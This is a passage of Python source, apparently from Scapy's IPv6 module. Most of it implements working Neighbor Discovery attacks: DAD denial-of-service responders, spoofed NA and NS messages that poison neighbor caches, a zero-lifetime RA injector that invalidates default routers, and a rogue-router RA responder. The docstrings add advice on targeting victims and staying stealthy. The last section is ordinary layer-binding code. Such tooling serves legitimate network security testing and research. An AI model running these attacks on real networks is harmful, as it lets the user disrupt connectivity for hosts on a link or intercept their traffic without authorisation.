3637 - the multicast mac address derived from the solicited node multicast
3638 address used as IPv6 destination address.
3639
3640 Following arguments can be used to change the behavior:
3641
3642 iface: a specific interface (e.g. "eth0") of the system on which the
3643 DoS should be launched. If None is provided conf.iface is used.
3644
3645 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3646 Only NS messages received from this source will trigger replies.
3647 This allows limiting the effects of the DoS to a single target by
3648 filtering on its mac address. The default value is None: the DoS
3649 is not limited to a specific mac address.
3650
3651 tgt_filter: Same as previous but for a specific target IPv6 address for
3652 received NS. If the target address in the NS message (not the IPv6
3653 destination address) matches that address, then a fake reply will
3654 be sent, i.e. the emitter will be a target of the DoS.
3655
3656 reply_mac: allow specifying a specific source mac address for the reply,
3657 i.e. to prevent the use of the mac address of the interface.
3658 """
3659
3660 def ns_reply_callback(req, reply_mac, iface):
3661 """
3662 Callback that reply to a NS by sending a similar NS
3663 """
3664
3665 # Let's build a reply and send it
3666 mac = req[Ether].src
3667 dst = req[IPv6].dst
3668 tgt = req[ICMPv6ND_NS].tgt
3669 rep = Ether(src=reply_mac) / IPv6(src="::", dst=dst) / ICMPv6ND_NS(tgt=tgt) # noqa: E501
3670 sendp(rep, iface=iface, verbose=0)
3671
3672 print("Reply NS for target address %s (received from %s)" % (tgt, mac))
3673
3674 _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
3675 tgt_filter, reply_mac)
3676
3677
3678def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
3679 reply_mac=None):
3680 """
3681 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3682 3756. This is done by listening incoming NS messages *sent from the
3683 unspecified address* and sending a NA reply for the target address,
3684 leading the peer to believe that another node is also performing DAD
3685 for that address.
3686
3687 By default, the fake NA sent to create the DoS uses:
3688 - as target address the target address found in received NS.
3689 - as IPv6 source address: the target address found in received NS.
3690 - as IPv6 destination address: the link-local solicited-node multicast
3691 address derived from the target address in received NS.
3692 - the mac address of the interface as source (or reply_mac, see below).
3693 - the multicast mac address derived from the solicited node multicast
3694 address used as IPv6 destination address.
3695 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
3696 with the mac address used as source of the NA.
3697
3698 Following arguments can be used to change the behavior:
3699
3700 iface: a specific interface (e.g. "eth0") of the system on which the
3701 DoS should be launched. If None is provided conf.iface is used.
3702
3703 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3704 Only NS messages received from this source will trigger replies.
3705 This allows limiting the effects of the DoS to a single target by
3706 filtering on its mac address. The default value is None: the DoS
3707 is not limited to a specific mac address.
3708
3709 tgt_filter: Same as previous but for a specific target IPv6 address for
3710 received NS. If the target address in the NS message (not the IPv6
3711 destination address) matches that address, then a fake reply will
3712 be sent, i.e. the emitter will be a target of the DoS.
3713
3714 reply_mac: allow specifying a specific source mac address for the reply,
3715 i.e. to prevent the use of the mac address of the interface. This
3716 address will also be used in the Target Link-Layer Address option.
3717 """
3718
3719 def na_reply_callback(req, reply_mac, iface):
3720 """
3721 Callback that reply to a NS with a NA
3722 """
3723
3724 # Let's build a reply and send it
3725 mac = req[Ether].src
3726 dst = req[IPv6].dst
3727 tgt = req[ICMPv6ND_NS].tgt
3728 rep = Ether(src=reply_mac) / IPv6(src=tgt, dst=dst)
3729 rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1) # noqa: E741
3730 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
3731 sendp(rep, iface=iface, verbose=0)
3732
3733 print("Reply NA for target address %s (received from %s)" % (tgt, mac))
3734
3735 _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
3736 tgt_filter, reply_mac)
3737
3738
3739def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
3740 reply_mac=None, router=False):
3741 """
3742 The main purpose of this function is to send fake Neighbor Advertisement
3743 messages to a victim. As the emission of unsolicited Neighbor Advertisement
3744 is pretty pointless (from an attacker standpoint) because it will not
3745 lead to a modification of a victim's neighbor cache, the function send
3746 advertisements in response to received NS (NS sent as part of the DAD,
3747 i.e. with an unspecified address as source, are not considered).
3748
3749 By default, the fake NA sent to create the DoS uses:
3750 - as target address the target address found in received NS.
3751 - as IPv6 source address: the target address
3752 - as IPv6 destination address: the source IPv6 address of received NS
3753 message.
3754 - the mac address of the interface as source (or reply_mac, see below).
3755 - the source mac address of the received NS as destination macs address
3756 of the emitted NA.
3757 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
3758 filled with the mac address used as source of the NA.
3759
3760 Following arguments can be used to change the behavior:
3761
3762 iface: a specific interface (e.g. "eth0") of the system on which the
3763 DoS should be launched. If None is provided conf.iface is used.
3764
3765 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3766 Only NS messages received from this source will trigger replies.
3767 This allows limiting the effects of the DoS to a single target by
3768 filtering on its mac address. The default value is None: the DoS
3769 is not limited to a specific mac address.
3770
3771 tgt_filter: Same as previous but for a specific target IPv6 address for
3772 received NS. If the target address in the NS message (not the IPv6
3773 destination address) matches that address, then a fake reply will
3774 be sent, i.e. the emitter will be a target of the DoS.
3775
3776 reply_mac: allow specifying a specific source mac address for the reply,
3777 i.e. to prevent the use of the mac address of the interface. This
3778 address will also be used in the Target Link-Layer Address option.
3779
3780 router: by the default (False) the 'R' flag in the NA used for the reply
3781 is not set. If the parameter is set to True, the 'R' flag in the
3782 NA is set, advertising us as a router.
3783
3784 Please, keep the following in mind when using the function: for obvious
3785 reasons (kernel space vs. Python speed), when the target of the address
3786 resolution is on the link, the sender of the NS receives 2 NA messages
3787 in a row, the valid one and our fake one. The second one will overwrite
3788 the information provided by the first one, i.e. the natural latency of
3789 Scapy helps here.
3790
3791 In practice, on a common Ethernet link, the emission of the NA from the
3792 genuine target (kernel stack) usually occurs in the same millisecond as
3793 the receipt of the NS. The NA generated by Scapy6 will usually come after
3794 something 20+ ms. On a usual testbed for instance, this difference is
3795 sufficient to have the first data packet sent from the victim to the
3796 destination before it even receives our fake NA.
3797 """
3798
3799 def is_request(req, mac_src_filter, tgt_filter):
3800 """
3801 Check if packet req is a request
3802 """
3803
3804 # Those simple checks are based on Section 5.4.2 of RFC 4862
3805 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
3806 return 0
3807
3808 mac_src = req[Ether].src
3809 if mac_src_filter and mac_src != mac_src_filter:
3810 return 0
3811
3812 # Source must NOT be the unspecified address
3813 if req[IPv6].src == "::":
3814 return 0
3815
3816 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
3817 if tgt_filter and tgt != tgt_filter:
3818 return 0
3819
3820 dst = req[IPv6].dst
3821 if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast.
3822
3823 # If this is a real address resolution NS, then the destination
3824 # address of the packet is the link-local solicited node multicast
3825 # address associated with the target of the NS.
3826 # Otherwise, the NS is a NUD related one, i.e. the peer is
3827 # unicasting the NS to check the target is still alive (L2
3828 # information is still in its cache and it is verified)
3829 received_snma = inet_pton(socket.AF_INET6, dst)
3830 expected_snma = in6_getnsma(tgt)
3831 if received_snma != expected_snma:
3832 print("solicited node multicast @ does not match target @!")
3833 return 0
3834
3835 return 1
3836
3837 def reply_callback(req, reply_mac, router, iface):
3838 """
3839 Callback that reply to a NS with a spoofed NA
3840 """
3841
3842 # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
3843 # send it back.
3844 mac = req[Ether].src
3845 pkt = req[IPv6]
3846 src = pkt.src
3847 tgt = req[ICMPv6ND_NS].tgt
3848 rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src)
3849 # Use the target field from the NS
3850 rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # noqa: E741
3851
3852 # "If the solicitation IP Destination Address is not a multicast
3853 # address, the Target Link-Layer Address option MAY be omitted"
3854 # Given our purpose, we always include it.
3855 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
3856
3857 sendp(rep, iface=iface, verbose=0)
3858
3859 print("Reply NA for target address %s (received from %s)" % (tgt, mac))
3860
3861 if not iface:
3862 iface = conf.iface
3863 # To prevent sniffing our own traffic
3864 if not reply_mac:
3865 reply_mac = get_if_hwaddr(iface)
3866 sniff_filter = "icmp6 and not ether src %s" % reply_mac
3867
3868 router = 1 if router else 0 # Value of the R flags in NA
3869
3870 sniff(store=0,
3871 filter=sniff_filter,
3872 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
3873 prn=lambda x: reply_callback(x, reply_mac, router, iface),
3874 iface=iface)
3875
3876
3877def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
3878 dst=None, src_mac=None, dst_mac=None, loop=True,
3879 inter=1, iface=None):
3880 """
3881 The main purpose of this function is to send fake Neighbor Solicitations
3882 messages to a victim, in order to either create a new entry in its neighbor
3883 cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated
3884 that a node SHOULD create the entry or update an existing one (if it is not
3885 currently performing DAD for the target of the NS). The entry's reachability # noqa: E501
3886 state is set to STALE.
3887
3888 The two main parameters of the function are the source link-layer address
3889 (carried by the Source Link-Layer Address option in the NS) and the
3890 source address of the packet.
3891
3892 Unlike some other NDP_Attack_* function, this one is not based on a
3893 stimulus/response model. When called, it sends the same NS packet in loop
3894 every second (the default)
3895
3896 Following arguments can be used to change the format of the packets:
3897
3898 src_lladdr: the MAC address used in the Source Link-Layer Address option
3899 included in the NS packet. This is the address that the peer should
3900 associate in its neighbor cache with the IPv6 source address of the
3901 packet. If None is provided, the mac address of the interface is
3902 used.
3903
3904 src: the IPv6 address used as source of the packet. If None is provided,
3905 an address associated with the emitting interface will be used
3906 (based on the destination address of the packet).
3907
3908 target: the target address of the NS packet. If no value is provided,
3909 a dummy address (2001:db8::1) is used. The value of the target
3910 has a direct impact on the destination address of the packet if it
3911 is not overridden. By default, the solicited-node multicast address
3912 associated with the target is used as destination address of the
3913 packet. Consider specifying a specific destination address if you
3914 intend to use a target address different than the one of the victim.
3915
3916 dst: The destination address of the NS. By default, the solicited node
3917 multicast address associated with the target address (see previous
3918 parameter) is used if no specific value is provided. The victim
3919 is not expected to check the destination address of the packet,
3920 so using a multicast address like ff02::1 should work if you want
3921 the attack to target all hosts on the link. On the contrary, if
3922 you want to be more stealth, you should provide the target address
3923 for this parameter in order for the packet to be sent only to the
3924 victim.
3925
3926 src_mac: the MAC address used as source of the packet. By default, this
3927 is the address of the interface. If you want to be more stealth,
3928 feel free to use something else. Note that this address is not the
3929 that the victim will use to populate its neighbor cache.
3930
3931 dst_mac: The MAC address used as destination address of the packet. If
3932 the IPv6 destination address is multicast (all-nodes, solicited
3933 node, ...), it will be computed. If the destination address is
3934 unicast, a neighbor solicitation will be performed to get the
3935 associated address. If you want the attack to be stealth, you
3936 can provide the MAC address using this parameter.
3937
3938 loop: By default, this parameter is True, indicating that NS packets
3939 will be sent in loop, separated by 'inter' seconds (see below).
3940 When set to False, a single packet is sent.
3941
3942 inter: When loop parameter is True (the default), this parameter provides
3943 the interval in seconds used for sending NS packets.
3944
3945 iface: to force the sending interface.
3946 """
3947
3948 if not iface:
3949 iface = conf.iface
3950
3951 # Use provided MAC address as source link-layer address option
3952 # or the MAC address of the interface if none is provided.
3953 if not src_lladdr:
3954 src_lladdr = get_if_hwaddr(iface)
3955
3956 # Prepare packets parameters
3957 ether_params = {}
3958 if src_mac:
3959 ether_params["src"] = src_mac
3960
3961 if dst_mac:
3962 ether_params["dst"] = dst_mac
3963
3964 ipv6_params = {}
3965 if src:
3966 ipv6_params["src"] = src
3967 if dst:
3968 ipv6_params["dst"] = dst
3969 else:
3970 # Compute the solicited-node multicast address
3971 # associated with the target address.
3972 tmp = inet_ntop(socket.AF_INET6,
3973 in6_getnsma(inet_pton(socket.AF_INET6, target)))
3974 ipv6_params["dst"] = tmp
3975
3976 pkt = Ether(**ether_params)
3977 pkt /= IPv6(**ipv6_params)
3978 pkt /= ICMPv6ND_NS(tgt=target)
3979 pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr)
3980
3981 sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0)
3982
3983
3984def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
3985 ip_src_filter=None, reply_mac=None,
3986 tgt_mac=None):
3987 """
3988 The purpose of the function is to monitor incoming RA messages
3989 sent by default routers (RA with a non-zero Router Lifetime values)
3990 and invalidate them by immediately replying with fake RA messages
3991 advertising a zero Router Lifetime value.
3992
3993 The result on receivers is that the router is immediately invalidated,
3994 i.e. the associated entry is discarded from the default router list
3995 and destination cache is updated to reflect the change.
3996
3997 By default, the function considers all RA messages with a non-zero
3998 Router Lifetime value but provides configuration knobs to allow
3999 filtering RA sent by specific routers (Ethernet source address).
4000 With regard to emission, the multicast all-nodes address is used
4001 by default but a specific target can be used, in order for the DoS to
4002 apply only to a specific host.
4003
4004 More precisely, following arguments can be used to change the behavior:
4005
4006 iface: a specific interface (e.g. "eth0") of the system on which the
4007 DoS should be launched. If None is provided conf.iface is used.
4008
4009 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
4010 Only RA messages received from this source will trigger replies.
4011 If other default routers advertised their presence on the link,
4012 their clients will not be impacted by the attack. The default
4013 value is None: the DoS is not limited to a specific mac address.
4014
4015 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
4016 on. Only RA messages received from this source address will trigger
4017 replies. If other default routers advertised their presence on the
4018 link, their clients will not be impacted by the attack. The default
4019 value is None: the DoS is not limited to a specific IPv6 source
4020 address.
4021
4022 reply_mac: allow specifying a specific source mac address for the reply,
4023 i.e. to prevent the use of the mac address of the interface.
4024
4025 tgt_mac: allow limiting the effect of the DoS to a specific host,
4026 by sending the "invalidating RA" only to its mac address.
4027 """
4028
4029 def is_request(req, mac_src_filter, ip_src_filter):
4030 """
4031 Check if packet req is a request
4032 """
4033
4034 if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
4035 return 0
4036
4037 mac_src = req[Ether].src
4038 if mac_src_filter and mac_src != mac_src_filter:
4039 return 0
4040
4041 ip_src = req[IPv6].src
4042 if ip_src_filter and ip_src != ip_src_filter:
4043 return 0
4044
4045 # Check if this is an advertisement for a Default Router
4046 # by looking at Router Lifetime value
4047 if req[ICMPv6ND_RA].routerlifetime == 0:
4048 return 0
4049
4050 return 1
4051
4052 def ra_reply_callback(req, reply_mac, tgt_mac, iface):
4053 """
4054 Callback that sends an RA with a 0 lifetime
4055 """
4056
4057 # Let's build a reply and send it
4058
4059 src = req[IPv6].src
4060
4061 # Prepare packets parameters
4062 ether_params = {}
4063 if reply_mac:
4064 ether_params["src"] = reply_mac
4065
4066 if tgt_mac:
4067 ether_params["dst"] = tgt_mac
4068
4069 # Basis of fake RA (high pref, zero lifetime)
4070 rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1")
4071 rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)
4072
4073 # Add it a PIO from the request ...
4074 tmp = req
4075 while ICMPv6NDOptPrefixInfo in tmp:
4076 pio = tmp[ICMPv6NDOptPrefixInfo]
4077 tmp = pio.payload
4078 del pio.payload
4079 rep /= pio
4080
4081 # ... and source link layer address option
4082 if ICMPv6NDOptSrcLLAddr in req:
4083 mac = req[ICMPv6NDOptSrcLLAddr].lladdr
4084 else:
4085 mac = req[Ether].src
4086 rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)
4087
4088 sendp(rep, iface=iface, verbose=0)
4089
4090 print("Fake RA sent with source address %s" % src)
4091
4092 if not iface:
4093 iface = conf.iface
4094 # To prevent sniffing our own traffic
4095 if not reply_mac:
4096 reply_mac = get_if_hwaddr(iface)
4097 sniff_filter = "icmp6 and not ether src %s" % reply_mac
4098
4099 sniff(store=0,
4100 filter=sniff_filter,
4101 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
4102 prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
4103 iface=iface)
4104
4105
4106def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
4107 ip_src_filter=None):
4108 """
4109 The purpose of this function is to send provided RA message at layer 2
4110 (i.e. providing a packet starting with IPv6 will not work) in response
4111 to received RS messages. In the end, the function is a simple wrapper
4112 around sendp() that monitor the link for RS messages.
4113
4114 It is probably better explained with an example:
4115
4116 >>> ra = Ether()/IPv6()/ICMPv6ND_RA()
4117 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
4118 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
4119 >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
4120 >>> NDP_Attack_Fake_Router(ra, iface="eth0")
4121 Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
4122 Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
4123 ...
4124
4125 Following arguments can be used to change the behavior:
4126
4127 ra: the RA message to send in response to received RS message.
4128
4129 iface: a specific interface (e.g. "eth0") of the system on which the
4130 DoS should be launched. If none is provided, conf.iface is
4131 used.
4132
4133 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
4134 Only RS messages received from this source will trigger a reply.
4135 Note that no changes to provided RA is done which imply that if
4136 you intend to target only the source of the RS using this option,
4137 you will have to set the Ethernet destination address to the same
4138 value in your RA.
4139 The default value for this parameter is None: no filtering on the
4140 source of RS is done.
4141
4142 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
4143 on. Only RS messages received from this source address will trigger
4144 replies. Same comment as for previous argument apply: if you use
4145 the option, you will probably want to set a specific Ethernet
4146 destination address in the RA.
4147 """
4148
4149 def is_request(req, mac_src_filter, ip_src_filter):
4150 """
4151 Check if packet req is a request
4152 """
4153
4154 if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req):
4155 return 0
4156
4157 mac_src = req[Ether].src
4158 if mac_src_filter and mac_src != mac_src_filter:
4159 return 0
4160
4161 ip_src = req[IPv6].src
4162 if ip_src_filter and ip_src != ip_src_filter:
4163 return 0
4164
4165 return 1
4166
4167 def ra_reply_callback(req, iface):
4168 """
4169 Callback that sends an RA in reply to an RS
4170 """
4171
4172 src = req[IPv6].src
4173 sendp(ra, iface=iface, verbose=0)
4174 print("Fake RA sent in response to RS from %s" % src)
4175
4176 if not iface:
4177 iface = conf.iface
4178 sniff_filter = "icmp6"
4179
4180 sniff(store=0,
4181 filter=sniff_filter,
4182 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
4183 prn=lambda x: ra_reply_callback(x, iface),
4184 iface=iface)
4185
4186#############################################################################
4187# Pre-load classes ##
4188#############################################################################
4189
4190
4191def _get_cls(name):
4192 return globals().get(name, Raw)
4193
4194
4195def _load_dict(d):
4196 for k, v in d.items():
4197 d[k] = _get_cls(v)
4198
4199
4200_load_dict(icmp6ndoptscls)
4201_load_dict(icmp6typescls)
4202_load_dict(ipv6nhcls)
4203
4204#############################################################################
4205#############################################################################
4206# Layers binding #
4207#############################################################################
4208#############################################################################
4209
4210conf.l3types.register(ETH_P_IPV6, IPv6)
4211conf.l3types.register_num2layer(ETH_P_ALL, IPv46)
4212conf.l2types.register(31, IPv6)
4213conf.l2types.register(DLT_IPV6, IPv6)
4214conf.l2types.register(DLT_RAW, IPv46)
4215conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46)
4216
4217bind_layers(Ether, IPv6, type=0x86dd)
4218bind_layers(CookedLinux, IPv6, proto=0x86dd)
4219bind_layers(GRE, IPv6, proto=0x86dd)
4220bind_layers(SNAP, IPv6, code=0x86dd)
4221# AF_INET6 values are platform-dependent. For a detailed explaination, read
4222# https://github.com/the-tcpdump-group/libpcap/blob/f98637ad7f086a34c4027339c9639ae1ef842df3/gencode.c#L3333-L3354 # noqa: E501
4223if WINDOWS:
4224 bind_layers(Loopback, IPv6, type=0x18)
4225else:
4226 bind_layers(Loopback, IPv6, type=socket.AF_INET6)
4227bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP)
4228bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP)
4229bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP)
4230bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP)
4231bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6)
4232bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6)
4233bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP)
4234bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)